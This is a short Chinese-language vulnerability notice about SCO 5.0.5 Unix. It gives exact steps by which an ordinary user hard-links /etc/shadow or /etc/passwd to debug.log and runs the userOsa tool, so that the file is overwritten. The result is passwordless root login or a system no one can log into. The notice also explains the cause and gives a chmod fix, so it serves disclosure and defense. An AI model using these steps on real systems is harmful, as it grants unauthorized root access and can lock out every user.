SCO5.0.5 Unix 有一個大BUG——任何普通用戶都可以成為超級用戶.
步驟:
1. 用普通用戶登錄到系統,然後進入一個有寫權限的目錄
2. ln /etc/shadow debug.log (硬連接)
3. 執行/etc/sysadm.d/bin/userOsa (O是大寫的字母o)
操作完成之後,/etc/shadow文件被覆蓋, 此時可以使用系統中的任何用戶登陸系統,不用密碼,包括root用戶.
注: 如果2中改為ln /etc/passwd debug.log
則/etc/passwd被覆蓋,誰也登錄不了系統.
原因:
SCO5.0.5 Unix中/etc/sysadm.d/bin/userOsa程序在運行時會生成一個名叫debug.log的文件,這個文件用戶屬於root 組,而且此程序有BUG,不會檢查用戶權限,因此可以覆蓋任何文件,包括passwd和shadow.
清除此漏洞:
用root用戶登錄,到/etc/sysadm.d/bin下執,行chmod o-x userOsa即可
此漏洞只在SCO5.0.5 unix存在, SCO5.0.6 unix或更高版本不存在.
